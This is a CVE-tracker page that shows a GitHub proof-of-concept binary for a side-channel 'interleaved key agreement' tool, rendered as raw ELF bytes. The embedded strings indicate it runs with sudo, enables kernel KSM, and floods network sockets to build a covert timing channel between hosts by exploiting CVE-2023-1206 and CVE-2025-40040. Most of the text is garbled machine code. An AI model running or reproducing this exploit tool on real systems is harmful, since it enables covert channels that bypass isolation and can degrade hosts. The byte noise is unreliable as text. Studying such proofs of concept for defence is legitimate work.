4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-49882
README.md
Rendering markdown...
POC / interleaved_key
⬇ Raw GitHub ✕ Close 
ELF>�@��@8
@('@@@������000�L�\�\���L�\�\��88800hhhDDS�td88800P�td ; ; ;��Q�tdR�td�L�\�\pp/lib64/ld-linux-x86-64.so.2 GNU���GNU�l�~�r`���#�g��GNU'�')*4Btu�e�m9�����b�� �&F��	�� <!��j7q]4v�-� Q�D|�!�\�"�@`� `setsockoptputsperrorclock_gettime__stack_chk_fail__printf_chkfreeaddrinfogetaddrinfobindputcharmunmappollfopensocketusleepsend__isoc23_strtolgetpidrecvoptarg__libc_start_mainstderrin6addr_anysendtolistengetoptsrand__cxa_finalizeacceptfclosesignalconnect__snprintf_chkfwritemadviseinet_ptonmmaplibc.so.6GLIBC_2.38GLIBC_2.4GLIBC_2.17GLIBC_2.34GLIBC_2.2.5GLIBC_2.3.4_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableK���Uii
`���j���uui	�ti	��\p�\0``�_�_�_�_"�_(�\' `*@`)�^�^�^�^�^�^�^	�^
�^__
__ _(_0_8_@_H_P_X_`_h_p_x_�_�_�_�_ �_!�_#�_$�_%�_&��H��H��OH��t��H����5�N�%�N@��h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f���h�"���f���h
����f���h����f���h��f���h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h�R���f���h�B���f���h�2���f���h�"���f���h����f���h����f���h��f���h ���f���h!����f����%�MfD���%NLfD���%FLfD���%>LfD���%6LfD���%.LfD���%&LfD���%LfD���%LfD���%LfD���%LfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%�KfD���%~KfD���%vKfD���%nKfD���%fKfD���%^KfD���%VKfD���%NKfD���%FKfDH�=9$�d������H�=,$�P������\
���AWE1�AVA�:4AUL�-%ATL�%�%U��SH��H��dH�%(H��$�1��D$�D$�D$L��H�މ�����������b��wIc�L�>��@H�;�1�H��$�dH+%(�)H�Ĩ[]A\A]A^A_�DH�=�J�
1����A����L�=�J�p���@H�=yJ�
1�����D$�P����D$�C����D$�6���M��u�|$uH�;����N���H�5��H�l$P�6���1��O���H�����1�H�\$���	���H�=J�]���H�=��Q���H�=��E���H�=~�9���1�� H����H���@�����|$�1�D��L�=J#�D$d�x�D$`���4L��H�������C�;4�?�D$D�����T$�t$H�������YH�=$ H�� ���H�=#���H�������$�H�5#1���z�����$�H�5#1���`���H�5"#�1��M����D$�H�|$h������H�������|$`����|$D��yM�|$��y>H������D��L��H�5�1���D$d���D��L���+�����Q�����J����H�
aH��H�=��;�����H�
?H��H�=���������H�
H��H�=�!������H�
�G��H�=�!�������H�
�G�$�H�=p����K����Y���f���1�I��^H��H���PTE1�1�H�=����G�f.�H�=QGH�JGH9�tH��FH��t	�����H�=!GH�5GH)�H��H��?H��H�H�tH��FH��t��fD�����=
Gu+UH�=�FH��tH�=�F����d�����F]������w��������F��AUf�1�ATUH���SH��H��XdH�%(H�D$H1��G0GG �
������xj�C
4;L�cH��
L���T�������I���@1�L��I��@L�s�5���L��L��
���������;����1Ҿ�������������C 4;�H�S$H�������C0H�=����1�H�T$HdH+%(u:H��X[]A\A]�f��C0H�=J�������C0H�=��������ff.����?��y�D����ff.���AWAVAUATU��SH��H��hfo�fo=�L�|$fo5�fo-�H�T$Pfo%�fo�dH�%(H�D$X1�L��fDo�H��f��fEo�fAo�fAo�fD��fAa�fAi�fDo�fa�fDi�fAo�fD��f��fAa�fDo�fAa�f��fEi�fDo�fEi�fAa�fAa�f��fg�fo�f��f��f��f��)H�H9��d���I��I��S㥛� L��i�����Hi$ʚ;HT$H��H��Hc�I��H��I��H�@L���K���Hi$ʚ;HT$H��H��I��H��H9�sK�C0�;��t"A�L�C�@L���@�f����@A�L�C �@L���@�D����f�L������Hi$ʚ;HT$H��H��I��H��H��L)�H�T$XdH+%(uH��h[]A\A]A^A_����ff.���AWE1�AVE1�AUE1�ATUH��S㥛� S��i��H��H�|$L�d$ Hc�L��dH�%(H��$81��|$��D$����HiT$ ʚ;HT$(H��H��H��H��H���H�|$��������pL�����HiT$ ʚ;HT$(H��H��H��H��H9�r�1�A��	~Ei��M)�Ic�L1�H��$8dH+%(ukH��H[]A\A]A^A_�D�|$�H�t$0�@��L���C�HiT$ ʚ;HT$(H��H��H��H��M��LD�I��A���<����?�ff.�@��SE1�H��A������"��1���H�H��������H�Ǻ�����xH�C1�[�f.�H�=I�t���f���SH��H�?H�G�H���v[�f���
��H�;�[�3���UH�-`H�=%SH��H���`�H��t$H��H����H�=2��H���'�H��H�=�(�H��H��t3H����H�=�W�H�����H��H�=[]��X[]�f�����fo�fDo
���fo=�fDo�fn�H�fo5�f`�fo-�fa�H��fp�f�fo�H��fA��fDo�fo�fo�fE��fAa�fAi�fDo�fa�fDi�fo�f��f��fAa�fDo�fa�f��fDi�fo�fAi�fAa�fa�f��fg�f��@�H9��{����f.���H�7E1�L���1�����Ј��1H�� ��H�� H��H	�H	�H)�I�L9�u�L��H���ff.����AUE1�ATI�UH��S1�H��H�MA��A��I��H�yH��H�H���H)������H�����H���=���H�A���u�H���������H�5*�H��1�H��H�U��H�EH��[]A\A]�f.���H��(dH�%(H�D$1�1�@�t$H��T$�H�L$1�f�D$�$�L�D$��H��������H�T$dH+%(uH��(��r�f���UH���S��H��dH�%(H�D$1��<$H���D$�	��~E1ɺH�����H��u.1��}�����H�T$dH+%(uH��[]�f�����������@��AWA��AVAUATA��USH��H��HD�KT�PdH�%(H�D$81�E����1�L�l$ f�1ɺf�t$&L��D$(�D$ ��D$$D�d$%�������H������{PE1�1ɺL���D$$H��fD�D$&�D$ �D�d$%H�D$(H�D$0�:��{PH������L�t$I��M1�M��I��A��L9K8s�CxE����H�D$8dH+%(��H��HD��[]A\A]A^A_�I���L���8����{4�P����{PL���H������1ɋ{PH�t$ f�L$&�1�L�t$�D$ ��D$$D�d$%H�l$(H�D$0�h��>���H��D��M��H��AUH�5
�1����XZ�6�����f���AWAVAUATA��U��SH��H��Hfo�fDo
�dH�%(H�D$81���fDo�fo=���fo5�fo-�fn�H�G@f`�fa�H��fp�f�fo�H��fA��fDo�fo�fo�fE��fAa�fAi�fDo�fa�fDi�fo�f��f��fAa�fDo�fa�f��fDi�fo�fAi�fAa�fa�f��fg�f��@�H9��{���D�ST�{PE���lL�t$ E1�f�1ɺL���D$$I��fD�L$&�D$ �@�l$%D$(����{P��L���@����P���H�{@����{TI�Ņ��{P��1��1��D$$f�t$&L���D$ �@�l$%H�D$(H�D$0�v��{P��L������L�D$L�KHM9�L��K�	IC�E1�H9�L��A��L1���A1�I���L9�s�C|E����H�D$8dH+%(��H��HD��[]A\A]A^A_�L�����]���1ɋ{P�f�L$&L��1��D$ ��D$$@�l$%L�l$(H�D$0���I���I���L�t$ L���
����{PE1�f�1ɺL��fD�D$&�D$ ��D$$@�l$%D$(�d����H����L��AVH�5@	1����XZ������D��AV1�L�59
AUA��ATA�ԉ�H�5>	UH���S1���H�=f	��H�=�	�u�H�=�	�i�H�E8'H�=��U�H�}@����D��1�H�5�	�F�E��E�@�����t�؉ٺ����H���TX���؃�D	�t3� N��A9�tO�f7��tED���H���t������fDD�M|D�Ex�1�D���L����� N�b�A9�u�[1�]A\A]A^�f���U1҉��S�
H��HdH�%(H�D$81��C���������A�H�L$�D$�E���f�
f��H�t$��o
$3f�|$��H�D$$D$f�D$L$� ���x>H�D$8dH+%(u7H��H��[]�1Ҿ����Å��\���������‰��7��������Uf�A��S�H���L�H��hdH�%(H�D$X1�H�l$@)D$H���D$)D$ )D$0��H�L$H��H��H�T$�������H�D$1ҋp�x����Å�x^����A�H�L$�D$��H�D$�ߋPH�p�f���x4H�|$��H�D$XdH+%(u-H��h��[]�H�|$�u�������։��'�H�|$�]������fD��AT1ҾU���
SH��@dH�%(H�D$81��1�����L�d$��ljþA�L���D$�0��
f��f�D$�o
1��H�t$f���D$H�D$$f�D$L$�������������H�5~1�����1�1����'��߉��.���x.��A�L����D$��H�=
�l�H�D$8dH+%(uH��@��[]A\�������������ff.���AT1�UHc�H�5�SH�������~&H�L�%���L��1�H����H9�u�[�
]A\������SH��H�=���H�=e��H�=���H�=���H�ڿ1�H�5P��H�=Z�v�H�=w�j�H�=��^��:4H�5�1���V��H�5�1���>�H�=�"�H�=��H�=*�
�H�ڿ1�H�5��H�ڿ1�H�5����H�=���H�=����H�=�[����H��H���[Net] Using IPv6 for CVE-2023-1206[Net] Using IPv4 (CVE-2023-1206 less effective)[KSM] MADV_MERGEABLE failed (KSM may not be enabled)/sys/kernel/mm/ksm/sleep_millisecs[R%03d NET] our=%lu peer=%lu combined=%lu -> bit=%d
[R%03d KSM] our=%lu peer=%lu (base=%lu) -> bit=%d

[Protocol] Starting interleaved key agreement (%d bits)
[Protocol] Even rounds: CVE-2023-1206 (Network)[Protocol] Odd rounds:  CVE-2025-40040 (KSM)
[Calibrate] Network baseline...
[Running] Starting %d rounds...

[Progress] %d/%d bits (net_entropy=%d, ksm_entropy=%d)
[Server] Listening on port %d...
╔════════════════════════════════════════════════════════════════╗║  Interleaved Side-Channel Key Agreement                        ║║  CVE-2023-1206 (Network) + CVE-2025-40040 (KSM)                ║╚════════════════════════════════════════════════════════════════╝
  -c HOST    Connect to HOST (initiator)  -l         Listen for connection (responder)  -p PORT    Control port (default: %d)
  -b BITS    Key bits (default: %d)
  Host B: sudo %s -c <host_a_ip> -v
  Even rounds: CVE-2023-1206 (IPv6 hash collision timing)  Odd rounds:  CVE-2025-40040 (KSM page merge timing)║  Interleaved Key Agreement                                     ║║  Even: CVE-2023-1206 | Odd: CVE-2025-40040                     ║[Client] Connecting to %s:%d...
Failed to establish connection
Failed to init network context
Failed to setup flood listen socket

════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════::ffff:%s[Net] Using IPv4-mapped IPv6socketmmapw10
/sys/kernel/mm/ksm/run1
[KSM] Enabled[KSM] Baseline: %lu cycles
[Calibrate] KSM baseline...%d[Server] Peer connected!Key: %02xUsage: %s [options]

Options:  -v         Verbose output  -h         Show help
Example:  Host A: sudo %s -l -v

Protocol:peerc:lp:b:vhFailed to init KSM context
Key agreement failed
KEY AGREEMENT COMPLETE  Network entropy bits: %d
  KSM entropy bits:     %d
  4��$��������������������������]����������������������������P����������;��� 0��H@��``���t�������p��`��xp������������H�����@���� ��40�H���P�������(�����������@�P��|zRx�`��&D$4���0FJw�?9*3$"\���t��� ����8����RF�H�A �I(�G��
(A ABBC�������������L���F�B�B �B(�A0�C8�G��
8A0A(B BBBAH\���qF�E�E �E(�A0�K8�O��
8A0A(B BBBF���nE�P
K������,�=E�Q
JX0L��E�O�G j
HAEAAA4���H��T4\���F�E�K �D(�F0(A ABB�X�nH0`
A(����E�I�F0`
AAJ\���F�E�B �B(�D0�A8�G��
8D0A(B BBBD|�K�T�A�\<���F�B�B �B(�D0�C8�G�
8D0A(B BBBA��L�O�A�8� �.F�K�E �M(�I0��(C BBB(���E�J�I`�
CAD(��E�M�X��
CAA00��BF�H�H �D`
 CABA(d��YF�C�K �xFB��E�
H�����F�E�H �I(�H0�C8�J�
8A0A(B BBBFp0K
�-�\�\���o���
��^0��
	���o���o(
���o�o�	���o�\0@P`p�������� 0@P`p�������� 0@`GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0L�W�(���JM�/�	"	�*�ND�
�
	5		&Kx	,	(ROintD	�
	*=
	�	-*	Y	��	n	��	�	�	�
	��	e		�=	�	�			��	�	�!�'

�
'	�
	�= �	�
1�c
3^
6	
<
7	
1
8	
�
9	
 �

:	
(�
;	
0�
<	
8u
=	
@A
@	
HR
A	
Pa
B	
XV
D�`�
F�h�
Hp
It�	
J�x0
MR��
NY�'
O���	
Q���	
Y
���	
[���
\��
]��
^	D�I
_
1��
`�x
b�	�	1P>
+9F�1�*�9�	�9��* 	!	N��):[�)	�
�	
� ��	�����Q	7	`'�D�	.s	�
�	��-�
%
�:�$
	CH�RS2=X%�
��
��
%r	�	�R ���n�X��
��*
E=�B���
�b �@Y�*
QM�	� {@�	�%
%	%�%� %�@d )	��!�XO��D���lF<�bX�	�
�|A��		P
�GO	�	T
�GS	�� E�!�E=)�j�@%�����	I!�)./�2X3L	\^f
b�gY
l�
s?	�
���I�b��
	v}�T�;��
;[�!;��1�!*�1*�A* }�[<�	�'A:)�[K|*F'05�)7n8�
9{
:�;
�<B1=	
 �>�('||�	�!* 5$MUfd&	['lZ(l<�p�	`V4�	���	���G ��	0	�	�b=�jD	�-p
�=p;	�	q��	r�s�dt��u�#v�-%w�=���	>net��?�	4��8>ksm��@��	PQ�	T>key�
�	XM�	x��	|��	*-��H	(����
�?�?
=Wx��LRB
B
R�X�b
�+[�
�
�2�
��
��
�(�
�~�
��?#��V�&	+�&�pP��1{��g���1����1�.)���)�)
2L%D1�^ED1P9DtD1��D11(�
�D11(a�D1�

*(��H

*(��l

�!�
F�
^c��
�1��o4�
)?n�
�f�:!F?fA�����)�����i[��
����	����	��k�	
f�	,*opt�	@:ctx��	��~GApp�V!YA��	T0Q:GA����!YA��	T0Q:�@W���A_]�@pn�@�~gA''�(vA��3�CU	x2gA33�vvA��?�CU	�5gA??��vA��K�CU	86gAKK�vA��W�CU	�3gA��'TvA����CU	7gA�)�vA���CUsgA��(�vA�CU	:gA*0vA&�
U2T	1:gA&&+�vA31@�
U2T	M:gA@@,�vAKIS�
U2T	i:gAkk.vAcas�CUs�<�3Q�<yu
��
gA�	�vA����
U2T	�6QR~�A��	�A��!�A�GU	�6T1QO�A��	^�A��!�AGU	�6T1QO�A	��A��!�A9GU	�9T1QK�A>>"	�A��!�A[GU	:T1QE�A``"	v�A
!�A}GU	�6T1Q$b
�UvTsQ}
@)
�)
G
�U2T	�,
�U0


'

h84p[6.Uv�FU~��<dUsT��"}U
;4��#�UsT��~�Q��~�k��U��T��~�8
|�
��5�Uv�� UT~
��

�G.���,���	�)#gA�,���vAJH�,�CU	x2gA�,�,��vA^\�,�CU	@3gA�,�,�8vArp�,�CU	�3gA�,�,��vA���,�CU	�3gA�,�,��vA��-�
U2T	Y9QsgA--�-vA��-�CU	o9gA--�{vA��&-�CU	�4gA&-&-��vA��2-�CU	�4gA2-2-�#vA��J-�
U2T	�4Q
:4gAJ-J-�}vAb-�
U2T	(5Q
gAb-b-��vAn-�CU	x9gAn-n-�vA20z-�CU	�9gAz-z-�gvAFD�-�CU	�9gA�-�-��vAZX�-�
U2T	�9QsgA�-�-�vArp�-�
U2T	P5QsgA�-�-�gvA���-�CU	�9gA�-�-��vA���-�CU	x5*gA�-��/vA��H0�-�CU	�5.l�`,Y�key���v�(��1�,*�i���*gA�,��%vA#!�,�
U2T|gAd,���vA;9�,�
U2T	N9*gA�,��/vA��H0�,�HU:���+B�� ��[Q��	��opt�	��2�������	��*A�+p��:A��gA�+�+�vA���+�
U2T	P2QvgA,,�	jvA��$,�CU	59?+!�U:T1Q0p+P�UsT1Q2R|X4�+0�UsT��QL�+�
�UsT1�+�
 UsT0Q0�+�
3 Us,P` UvT6Q1R|X4F,�
x Us
R,G�{�)�q"�{!�{++%2�}|��res~���2�
q"�@��	RHopt�	���A?*Q��!�Axv�A���A��N*"IUvT@Q2R@X	29Y�Tc*�!UsTvQ��R��}*!�!Q0�*P"UsT6Q1R��X4�*�
$"Us
�*�

�*�
�*�
V"Us
+�

+G�"*2d)���#�d���f	��optj	��2�m���*A�)>o#:A-)!3#U:T2Q0[)Pa#UsT1Q2R��X4�)0�#UsT��QL�)!�#U2T2Q0�)�
�#Us
�)G�1�'.�d'ctx1(d'-k11phf1?��1Z(�p%@���
A
($�L
F<9M
�z�?�(.X	�$�?���(��$U
 N�(�U
 NgA�(�(T
A%vA���(�
U2T~QsR}
m(,�(i'UvTsQ|gA�'3�%vA��(�
U2T	01Q}gA((4&vA		(�CU	p1gA((5Y&vA		(�CU	�1gA((8�&vA,	*	'(�CU	�1gA/(/(;�&vA@	>	;(�CU	9gAD(D(>N'vAT	R	Z(�
U2T	�1Q}D(�1Uv��	��$��,ctx�-d'r	j	�6�	�	f�E�	�	msg�;	����


��B
>
M�`
X
�
	�
�
�3%���(4�
�
�3
�44=9H&4"%�'4`^%1�%��	&)k1pn^1pnQ1�~D1��71���x1�� &{T~QHR0�?0&0&
n)�?��:&�U
P�%1T&T&6	�)k1��^1��Q1��D1��71x1���&{T~QHR0%1'�	�*k1^1%#Q142D1CA71SQ�x1��L'{T~QHR0%1i'�	+k1b`^1b`Q1rpD1�71���x1���'{T~QHR0gA�'�' '	k+vA���'�
U2T	�0QvR}0&�/�+TQ
�C&�2�+Us��&�/�+TQ
�'�/�+TQ
�f'�/,TQ
�
�'G��#���/ctx�,d'���5��f�D%

msg�;	�����^
R
����
�
M���
�
�
�	�
�
%1;#;#6�	Z-k1^1Q1'%D16471FDx1��q#{T}QHR0�?q#q#
�	�-�?US{#�U
�%1�#��	*.k1ec^1wsQ1��D1��71���x1���#{T}QHR0%1s$��	�.k1��^1��Q1��D1��71���x1���${T��QHR0gA�$�$$�	/vA�$�
U2T	�0Q|RvX~�#X:5/UsTN�#�/U/T��Q
�8$�/t/T}Q
�E$67�/TPX$�/�/T}Q
�
�$GP�p"�� 1��&msg�' 1PH�0vrpfd��PZ@�"��	�0�@��u@��i@���"H
U�PT1Q�Q�@�"�"�	1�@���@���@���@�@�"�UsTvQHR0
�"G;	Iz��1"��"�	�"�"�0�"��@�"#�Q�@msg�;	Z
�P!���2ctxZ#�2("�\�KGAT�2i^ca�@p!g`	+2Asq�@���@���?�!�!
a	s2�?���!�U
��!�2Uv*gA�!zfvA���!�
U2T	�8��G
�� T��3ctxG'�2��pI�3���L�iN4.t1O�fbt2R���@!+O�3+@��#@��*@!ARA@��#@���XH
734Yctx7"�2"7+@p934Z:<
�[@i=�.6
(`���5f*)
�A��-�4�A75�AQM�GU	�8T1Q3Rs�A��0=5�Age�A�}�GU	�8T1Q2RsgA��0,5vA��0��CU	�8���5U	�0Tv���5Us���5U	�8Tv��Us.A =�[6ctx�2��O%E6T
Q=0]
T
\���67ctx�2��gA�	�6vA�CU	`0�E�6U0T
Q3R"X	�Y0�%7T
Q<��
U	�8J��0q�H:3E� +'3�1FBKbuf�
H:��}Kpfd���}#r��b^#���{y#X	�	��#����A�|94ret�
��1HT94now����$�@HH�
�8�@���@���@
�@1/�@B@`�U��}�T��}Q
R@B�?`��+�?``�.�?��}ml
U1T|+Z@����@TRu@TRi@hb�H
U��}T1Q15�?�}��9B�?���.��?��}�l
U1T|$�?��)�::+�?���.�?��}�l
U1T|
�G�X:*�J����<Lctx�%�<��3��.��<��
�<��~#i����4end��#(�	64#n��LD1q� ;4i���5�?G�v;B�?Z�.Z�?��~0l
U1T}$�?XX(��;+�?XX�.�?��~el
U1T}5�?�m�:<+�?���.�?��~�l
U1T}��
i<TQ@R@XsYL��
�<TQ@R@Xs Y@
"G���<*?]7��<,ctx��<^����?Lctx��<��3��*!A5�><���?��$�A&�	�=�AUS�Amk�A�|+"IU}T@Q2R@X	�8Yv$gA���
�=vA����CU	0$gA���
G>vA����CU	�8�j>U:TvQ|;�>U:T}Q|
K�
5�@�"��>A���@���@��$gA���(?vA����CU	00�!I?U:T2Q0\!j?U2T2Q0~�?U2TvQs$
�G��
U	�8�?*?_���?,ms�`t��6|��@7ts�^6Uy�/@7lo{=7hi{=a5q
��Z@bsqU&�%�@�	%
�%$�%0&a"�@�
"�"D,__n"%1b".7sz$
1&�9D
At
9D�9�916�1�*Al1�6^"sGAl"sI��gA"$�&�T�A�T )&�M�A�M.�M<)&3�A,__s3,__n31�3)C�<��B�<c�
C�3 ��B/�3U/4T4"4?;H&4 �'4b`C%1"n�C71tpD1��Q1��^1��k1��x1�PH"{CU�UT�PQHR0
n"G
���╔════════════════════════════════════════════════════════════════╗
8��
J�H║  Interleaved Key Agreement                                     ║

J�H║  Even: CVE-2023-1206 | Odd: CVE-2025-40040                     ║

���╚════════════════════════════════════════════════════════════════╝


���
════════════════════════════════════════════════════════════════

���════════════════════════════════════════════════════════════════

�KEY AGREEMENT COMPLETE
8i_d��
J�H║  Interleaved Side-Channel Key Agreement                        ║

J�H║  CVE-2023-1206 (Network) + CVE-2025-40040 (KSM)                ║

�
Options:

,�*  -c HOST    Connect to HOST (initiator)

2�0  -l         Listen for connection (responder)

�  -v         Verbose output

�  -h         Show help


�
Example:

�
Protocol:

=�;  Even rounds: CVE-2023-1206 (IPv6 hash collision timing)

9�7  Odd rounds:  CVE-2025-40040 (KSM page merge timing)

�
8yo
�[Server] Peer connected!
8�
3�1[Protocol] Even rounds: CVE-2023-1206 (Network)

1�/[Protocol] Odd rounds:  CVE-2025-40040 (KSM)


#�![Calibrate] Network baseline...

�[Calibrate] KSM baseline...

�[KSM] Enabled

8�6[KSM] MADV_MERGEABLE failed (KSM may not be enabled)

&�$[Net] Using IPv6 for CVE-2023-1206

 �[Net] Using IPv4-mapped IPv6

3�1[Net] Using IPv4 (CVE-2023-1206 less effective)
I~1�BIH}H}1R�BX!YW
:;9I8(	:;9I
6!I
:;9I8
H}4:!;9I�B1R�BUX!YW.?:;9'I<:!;9I�B:;9I41UI!I/41�B($>.?:!;9'I@z:!;9I�B7I.?:;9'I<4:!;9I�B4:!;9I :;9!!1":;9I#4:!;9I�B$1R�BX!YW%(&.?:;9!'I !4'&I(.?:;9n'I<)*1R�BUX!YW+1R�BX!YW,:;9I-:;9I..?:!;9!'@z/10H}�124:!;9I3:!;9I�B44:!;9I�B51R�BUX!YW6.:;9'I !74:;9I8.?<n:!;!9<:4:;9I?<;
:!;9I<4:!;9I=:!;9!	>
:!;9I8?.?:;9!
'<@4:!;9IAUB1R�BUX!YWC.1@zD5IE>!!I:;9!F:;9!G!:!;9!	H1I.?:;9'I J.?:!;9!
'I@zK4:!;9IL:!;9I�BM%UNO$>P:;9Q&R'S>I:;9T:;9U
:;9I8V:;9W.?:;9'I<X.?:;9' Y:;9IZ4:;9I[\.?:;9'IU@z].?:;9' ^.?:;9'IU@z_.:;9' `.:;9'I a.:;9'@zb:;9IcH}�d.?<n���
Ps����	 .7?IT]fnu|�������������	%0 	��"J+38�'.
�f�J*jT���
t�
���XX/	K"	w*
J�	��
<#	�
�	�x/�v!XJ�u�
��Y(.J 
bt
u�
�
�
_
u�
�
�.X	�K.Ke�fJ
<	����'y�7�<(��fY&�7[(�t7�<��=J�'y�&�7[��	Y
=-
K"��'y�&�X�7�J��hJ J.<X	0j8	4z<377�<��/Dxft�J/�X�<<�/�JX���'yY&�7[��>	��~
X�	�J�'y�&�7[��X#.i9t9<)<=�
t��~֞
��'y�&�7[1��7�t<
�JX<K!;=fX>�	�O�/ 	��~
��JK =<Jj 	���	�K	#�	#9	MY��~
�"��	!X�~
�!�,��~�
�~J�t 
�~ X�  �K
g
t-	�k%I��K
:	�~�J�~</	�	K=�~/	��~!J.J�!�~t�ff
`u�K

�}t��Y-	O�}
��
�}J���	��~%�	��8�
�}���
�}<�.JK�}
X�Kf���{y<QyX_y.@X��
�}�X�t�
�}<<���}
X�K�}�g�J 0�x'��	Ly<�	��5yXQyt_y<_y'X	9�}%�	�	��<Cy��X	>��X	>�Xg*	tL	gM�� ....	fJ�<Z	��	>Y�	�.�<yX_�t	Y��@X�	��|
"�.Y
t
�~����~
g
t�t	�k%I��	K;	��yX{y�	�X�<{X	���}%���9?	/;	g�~5yt�y<�X	��	X*N?4e?K�?>HA
<>(t	YM�� ...	b<��~	�.�~<yX_yX�@XX	���	�X<Y�<{y��@XX	��|
��.Y�K�|�
�|.��
�|�.t�
�|JX�
�|<X��|
���|
���|
����|
����|
X�
*
�	_
H&1
q?& <&. .	N <	��|%�;�*X	��
]X
��|
�	��|%�;�*XJ..	XY-/W!WJ�Y.�	e�Z
�{�.
�{�	�Jz�	�z.�{.�^	XPtnJ/�	tu2[YI
�{<�X
�{ �X
�{<X�tJ�
�{�X
�{X<���{�
�{�X�	J�*X�L	e�Z(	X�P�s�(�@		tu�3�gs=WX�Y��	��Z	�z.�{X�
�{�	�.
�{XJ	�zXz	X���{
J��-/Z	K
I	�Y�{
��	o�usX.	.K�{�
�{.�.
�{Jt� 
�{<XX�
t%��{%�
�{<��
�{JX!�Y�{�
�{ �X
�{<��K�{� 
�{<tX��{
���{
���{
���{
X��{
���{
���{
���{
t��{
t��{
���{
���{
���{
X��{
X��{
���z
���z
�t
�z 		���	���	��g;	1c		�wt�/	��4�4�	�<4(�/�.�.�}
.<(��'t��}
.J,�	T��	���	
�sXY�X
�z.�X.Z�z
���z
���z
���z
���z
��Y	��	�/=r	K	YR�	���K�	���z
.��z
���z
���z
���z
���z
.�u�z
���JK�{JJ��	TX
�z�<	��z
X	��{�t%�	^t�z
�	�	]�z
�	�	iX�z
�	�	!X�z
�	�	zX�z
�X�__recv_aliasIPPROTO_MAXsin6_flowinfo_shortbufai_canonname_IO_lock_t__pad5recv_protostderr__flagsIPPROTO_IP_IO_buf_end__poll_aliassa_datasignalIPPROTO_MPTCPrun_interleavedsockaddrbindksm_measure_writesin6_scope_id_IO_write_endround_cve_2023_1206_freeres_listtimeout_ms__nptrgetopt__socket_typeIPPROTO_IGMPcombined_markers__builtin_fwriteksm_ctx_tsend_protoduration_msconnect_to_peer__u6_addr32__timeoutnfds_tGNU C17 13.3.0 -mtune=generic -march=x86-64 -g -O2 -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protectionmmaprdtsc__u6_addr16send__bsxfirst_packetround_numIPPROTO_ESPnet_initpeer_timingnet_flood_burstIPPROTO_EGP__lenlong long unsigned intIPPROTO_IPV6__u6_addr8MSG_ERRQUEUEdeadlinetarget4target6sin_family__uint16_tnet_cleanup__sighandler_t_IO_backup_baseMSG_TRUNCprint_keyin_port_tlsockIPPROTO_PUPpeer_ipfprintf_filenoMSG_OOB__bufsin6_portsin_zeros_addrtv_nsecusleepsa_family_tsrand_vtable_offsetai_addrMSG_TRYHARDIPPROTO_BEETPHproto_msg_t_IO_read_baseflood_listen_sockMSG_FINMSG_EOR_IO_save_endelapsedbytessin6_addrIPPROTO_TCP__uint64_t__poll_chk_warnlisten__poll_chkIPPROTO_UDPhints__fmt__isoc23_strtolacceptctrl_sock__streamnet_baselinetimespec__fprintf_chkIPPROTO_IPIPsetup_listen_socket_IO_markeris_initiator_IO_read_ptrnum_bitsget_usMSG_NOSIGNALSOCK_DCCP__builtin_putsmappedSOCK_PACKET__nfdsMSG_DONTWAITnet_measure_floodksm_init_IO_write_baseSOCK_DGRAM__pid_tlong long intperrorksm_calibratepackets_sentsig_handler_IO_save_basesin_portIPPROTO_AHsendtopage__printf_chkget_nsIPPROTO_ICMPmadviselast_packetmsleeplisten_modeinterleaved_ctx_t__syscall_slong_tmemsetksm_entropy_bitsMSG_ZEROCOPYMSG_SYN__recv_chksnprintf_freeres_bufin6addr_anypollfd__in6_usin_addrnet_entropy_bits__bswap_16start__builtin_putcharinet_ptonaccept_peerMSG_FASTOPENpollfopenargc__chIPPROTO_IDPMSG_CTRUNCMSG_CMSG_CLOEXECoptargargvprint_usagemainclock_gettimeIPPROTO_RSVPIPPROTO_GRESOCK_STREAMsetsockopt_IO_read_endIPPROTO_ETHERNETreventssin6_familyai_familyshort intconnect__clockid_tbyte_idxMSG_DONTROUTEport_str__stack_chk_fail__bswap_32IPPROTO_PIM_IO_wide_datapeer_hostfcloseMSG_PEEK__SOCKADDR_ARGMSG_BATCH__ssize_tsockaddr_in__uint8_tIPPROTO_SCTPIPPROTO_MTPpacket_count__useconds_tSOCK_CLOEXECIPPROTO_TPmagicmsg_typeMSG_RSTMSG_MORE__CONST_SOCKADDR_ARG_locktv_sec__fdsprognet_ctx_t_IO_codecvt_old_offset_IO_FILEIPPROTO_UDPLITESOCK_RAWMSG_WAITFORONEMSG_WAITALLksm_enable_systemksm_fill_patternIPPROTO_COMPIPPROTO_ENCAP__destai_protocolai_socktypeunsigned char__uint32_tkey_bit__socklen_t__recv_chk_warn_IO_write_ptrSOCK_SEQPACKET__fdIPPROTO_L2TP__time_tround_cve_2025_40040roundnonceai_flagsmunmapbit_posksm_cleanupMSG_CONFIRM__off_trecvverbosesa_familygetpidshort unsigned intIPPROTO_MPLSuse_ipv6ai_nextatoiour_timingSOCK_NONBLOCKtotalrunningin_addr_t_chainai_addrlen__builtin___snprintf_chk_flags2MSG_PROXYfreeaddrinfo_cur_columnsockaddr_in6IPPROTO_DCCPgetaddrinfoIPPROTO_RAW__off64_t_unused2_IO_buf_baseSOCK_RDMinterleaved_key_agreement.c/home/vlad/Desktop/convert_channel_bug_exploitation/usr/include/x86_64-linux-gnu/bits/usr/include/usr/lib/gcc/x86_64-linux-gnu/13/include/usr/include/x86_64-linux-gnu/bits/types/usr/include/netinet/usr/include/x86_64-linux-gnu/sys/usr/include/arpastring_fortified.hstdio2.hpoll2.hsocket2.hbyteswap.hstdlib.hstddef.htypes.hstruct_FILE.hstdio.hclockid_t.htime_t.hstruct_timespec.hstdint-uintn.hunistd.hgetopt_core.hsignal.hsockaddr.hsocket.hin.hnetdb.hpoll.htime.hstdio2-decl.hmman.hinet.h<built-in>socket_type.h�\U\�V���U���V���U���V���U��\T\�S���T���S���T���S���T��0���_��_��_��_�0��
:4���P�
���P�0�P��P��PW��W0�WS'�C3��C?�=DK��D��XE�!F���F
1:�&
M:�@
i:�k�!F���~�FM��~��
�6��
�6��
�6�
�9�>
:�`
�6��,U�S���U��,�C�,�G�,�cG�,��D�,
Y9�-��G-��G&-��G2-
�4�J-
